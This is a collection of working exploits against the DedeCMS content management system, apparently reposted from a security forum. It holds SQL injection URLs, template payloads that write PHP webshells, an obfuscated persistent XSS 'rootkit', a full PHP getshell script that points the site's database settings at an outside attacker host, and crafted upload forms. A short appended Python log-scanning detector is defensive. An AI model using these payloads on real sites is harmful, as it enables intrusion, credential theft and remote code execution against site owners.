Dedecms 5.6 RSS injection vulnerability
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1

DedeCms v5.6 embedded malicious code execution vulnerability
Register a member account and upload a piece of software; in the local-address field enter a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
After publishing, viewing or editing the entry executes it.
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
This generates x.php with password xiao, a one-line shell created directly.

Dede 5.6 GBK SQL injection vulnerability
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe'
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7

DedeCms V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`

DEDECMS all versions gotopage variable XSS vulnerability
1. Copy and paste the URL below into the browser; it triggers the XSS and installs the XSS rootkit. Note that IE8/9 and similar browsers block URL-based XSS, so their XSS filter has to be turned off.
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="

2. Close the browser; whichever of the URLs below is visited afterwards, our XSS fires.
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda

http://v57.demo.dedecms.com/dede/login.php

DeDeCMS (织梦) variable override getshell
#!usr/bin/php -w
<?php
error_reporting(E_ERROR);
set_time_limit(0);
print_r('
DEDEcms Variable Coverage
Exploit Author: www.heixiaozi.comwww.webvul.com
');
echo "\r\n";
if($argv[2]==null){
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url aid path
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
Example:
php '.$argv[0].' www.site.com 1 old
+---------------------------------------------------------------------------+
');
    exit;
}
$url=$argv[1];
$aid=$argv[2];
$path=$argv[3];
$exp=Getshell($url,$aid,$path);
if (strpos($exp,"OK")>12){
    echo "
Exploit Success \n";
    if($aid==1)echo "
Shell:".$url."/$path/data/cache/fuck.php\n" ;
    if($aid==2)echo "
Shell:".$url."/$path/fuck.php\n" ;
    if($aid==3)echo "
Shell:".$url."/$path/plus/fuck.php\n";
}else{
    echo "
Exploit Failed \n";
}
function Getshell($url,$aid,$path){
    $id=$aid;
    $host=$url;
    $port="80";
    $content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
    $data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
    $data .= "Host: ".$host."\r\n";
    $data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
    $data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
    $data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
    //$data .= "Accept-Encoding: gzip,deflate\r\n";
    $data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
    $data .= "Connection: keep-alive\r\n";
    $data .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $data .= "Content-Length: ".strlen($content)."\r\n\r\n";
    $data .= $content."\r\n";
    $ock=fsockopen($host,$port);
    if (!$ock) {
        echo "
No response from ".$host."\n";
    }
    fwrite($ock,$data);
    while (!feof($ock)) {
        $exp=fgets($ock, 1024);
        return $exp;
    }
}
?>

DedeCms v5.6-5.7 unauthorized access vulnerability (direct entry to the admin backend)
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

Change validate=dcug above to the current captcha value and you go straight into the site backend.
The precondition for this vulnerability is that the backend path must already be known.

Dedecms 织梦 tag remote file write vulnerability
Precondition: you must have your own dede database ready, then insert this row: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');

Then submit using the form below; the shell is 1.php in the same directory. Work out the principle yourself...
<form action="" method="post" name="QuickSearch" id="QuickSearch">
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="提交" name="QuickSearchBtn"><br />
</form>
<script>
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>

Dedecms <= V5.6 Final template execution vulnerability
1. Register a user, enter the member backend, publish an article and upload an image; then, in attachment management, replace the image with our crafted template. For example the image name is:
uploads/userup/2/12OMX04-15A.jpg

The template content is (if image formats are restricted, prepend gif89a):
{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}

2. Edit the article just published, view the page source and build a form:
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1275972263" />

<div id="mainCp">
<h3 class="meTitle"><strong>修改文章</strong></h3>

<div class="postForm">
<label>标题:</label>
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>

<label>标签TAG:</label>
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)

<label>作者:</label>
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>

<label>隶属栏目:</label>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>测试栏目</option>
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)

<label>我的分类:</label>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>hahahha</option>
</select>

<label>信息摘要:</label>
<textarea name="description" id="description">1111111</textarea>
(内容的简要说明)

<label>缩略图:</label>
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>

<input type='text' name='templet'
value="../uploads/userup/2/12OMX04-15A.jpg">
<input type='text' name='dede_addonfields'
value="templet,htmltext;">(这里构造)
</div>

<!-- form action area -->
<h3 class="meTitle">详细内容</h3>

<div class="contentShow postForm">
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>

<label>验证码:</label>
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
<img src="http://127.0.0.1/dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />

<button class="button2" type="submit">提交</button>
<button class="button2 ml10" type="reset">重置</button>
</div>

</div>

</form>

Submit; if it reports that the edit succeeded, we have changed the template path.
3. Visit the edited article. Assuming the article just edited has aid 2, we only need to visit
http://127.0.0.1/dede/plus/view.php?aid=2
and the webshell 1.php is generated in the plus directory.

DEDECMS website management system Get Shell vulnerability (5.3/5.6)
Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}
Save as 1.gif
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="aid" value="7" />
<input type="hidden" name="mediatype" value="1" />
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /><br />
<input type="hidden" name="dopost" value="save" />
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
<input name="addonfile" type="file" id="addonfile"/>
<button class="button2" type="submit">更改</button>
</form>

Build the form above; after uploading, the image is saved as /uploads/userup/3/1.gif.
Publish an article, then build the edit form as follows:

<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1282049150" />
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test</option>
</select>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>aa</option></select>
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
<input type='hidden' name='dede_addonfields' value="templet">
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
<button class="button2" type="submit">提交</button>
</form>

织梦 (Dedecms) V5.6 remote file deletion vulnerability
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif

织梦 (Dedecms) V5.6 plus/carbuyaction.php local file inclusion vulnerability
http://www.test.com/plus/carbuya ... urn&code=../../

DedeCms V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
The stored password is the 32-character MD5 with the first 5 and the last 7 characters removed, which gives the 20-character MD5 password; from that, remove 3 more from the front and 1 from the end to get the 16-character MD5.

织梦 (Dedecms) 5.1 feedback_js.php injection vulnerability
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='

织梦 (Dedecms) select_soft_post.php uninitialized page variable vulnerability
<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
<input type='hidden' name='activepath' value='/data/cache/' />
<input type='hidden' name='cfg_basedir' value='../../' />
<input type='hidden' name='cfg_imgtype' value='php' />
<input type='hidden' name='cfg_not_allowall' value='txt' />
<input type='hidden' name='cfg_softtype' value='php' />
<input type='hidden' name='cfg_mediatype' value='php' />
<input type='hidden' name='f' value='form1.enclosure' />
<input type='hidden' name='job' value='upload' />
<input type='hidden' name='newname' value='fly.php' />
Select U Shell <input type='file' name='uploadfile' size='25' />
<input type='submit' name='sb1' value='确定' />
</form>
<br />It's just a exp for the bug of Dedecms V55...<br />
Need register_globals = on...<br />
Fun the game,get a webshell at /data/cache/fly.php...<br />
</body>
</html>

织梦 (dedecms) 5.3 – 5.5 plus/digg_frame.php injection vulnerability
It exploits a MySQL error raised by a numeric field overflow, combined with DEDECMS writing database error messages into a PHP file whose header is not validated.
1. Visit the URL:
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
The error message is shown:

2. Visit http://www.abc.com/data/mysql_error_trace.php; seeing the following output proves the injection succeeded.
int(3) Error: Illegal double '1024e1024' value found during parsing
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>

3. Open test.html from dede.rar; note that the form's action address is
<form action="http://www.abc.com/data/mysql_error_trace.php" enctype="application/x-www-form-urlencoded" method="post">

After clicking OK, seeing the same output as in step 2 means the trojan file was uploaded successfully.

织梦 (DedeCms) plus/infosearch.php file injection vulnerability
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*
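The request shapes collected in this post (the _COOKIE[GLOBALS]/_POST[GLOBALS] variable override, the raw sql= parameter to advancedsearch.php, the gotopage XSS, the edit_face.php path traversal, and the rss.php, feedback_js.php and infosearch.php injections) can be matched against ordinary web-server access logs. The Python below is an added detection example, not part of the original post; the signature names, the log-format regex and the sample log lines are constructed here, and it assumes common/combined log format with the request target unmodified.

```python
from __future__ import annotations

import re
from urllib.parse import unquote_plus

# Request-target signatures for the DedeCMS issues listed in this post.
# Constructed for this example; each is matched against the percent-decoded
# request target (path + query string) of a log line.
SIGNATURES = (
    ("globals_override",
     re.compile(r"_(?:COOKIE|POST|GET)\[GLOBALS\]\[cfg_\w+\]", re.I)),
    ("advancedsearch_raw_sql",
     re.compile(r"/plus/advancedsearch\.php\?.*[?&]sql=\s*select\b", re.I)),
    ("gotopage_xss",
     re.compile(r"[?&]gotopage=[^&]*<script", re.I)),
    ("edit_face_traversal",
     re.compile(r"/member/edit_face\.php\?.*dopost=delold.*oldface=[^&]*\.\./", re.I)),
    ("rss_updatexml_injection",
     re.compile(r"/plus/rss\.php\?.*updatexml\s*\(", re.I)),
    ("union_select_injection",
     re.compile(r"/plus/(?:feedback_js|infosearch)\.php\?.*\bunion\s+select\b", re.I)),
)

# Common/combined access-log line: client ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)


def decode_target(target: str) -> str:
    """Percent-decode twice so double-encoded payloads still surface; never raise on bad bytes."""
    return unquote_plus(unquote_plus(target, errors="replace"), errors="replace")


def classify_target(target: str) -> list[str]:
    """Return the names of every signature the decoded request target matches."""
    decoded = decode_target(target)
    return [name for name, rx in SIGNATURES if rx.search(decoded)]


def scan_log(lines) -> list[dict]:
    """Parse access-log lines and return one record per line that hits a signature."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not in the expected log format; skip rather than guess
        names = classify_target(m["target"])
        if names:
            hits.append({"ip": m["ip"], "time": m["time"], "method": m["method"],
                         "target": m["target"], "status": int(m["status"]),
                         "signatures": names})
    return hits


# Constructed sample log lines modelled on the request shapes above
# (RFC 5737 documentation addresses; not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Jun/2010:12:00:01 +0800] "GET /plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20%60%23@__admin%60 HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Jun/2010:12:00:07 +0800] "GET /dede/login.php?dopost=login&validate=abcd&userid=admin&pwd=x&_POST[GLOBALS][cfg_dbhost]=198.51.100.9&_POST[GLOBALS][cfg_dbuser]=root HTTP/1.1" 302 0',
    '198.51.100.23 - - [10/Jun/2010:12:01:00 +0800] "GET /member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif HTTP/1.1" 200 88',
    '198.51.100.23 - - [10/Jun/2010:12:01:30 +0800] "GET /dede/login.php?gotopage=%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 1024',
    '192.0.2.77 - - [10/Jun/2010:12:02:00 +0800] "GET /plus/rss.php?tid=1 HTTP/1.1" 200 2048',
    '192.0.2.77 - - [10/Jun/2010:12:02:05 +0800] "GET /dede/login.php?gotopage=dasdasdasda HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["ip"], hit["target"][:60], hit["signatures"])
```

The second-stage gotopage requests (step 2 of that section) look benign in the URL because the payload lives in the cookie, so URL signatures alone never catch them; likewise the POST body sent to mytag_js.php never reaches an access log and needs a WAF or request-body logging.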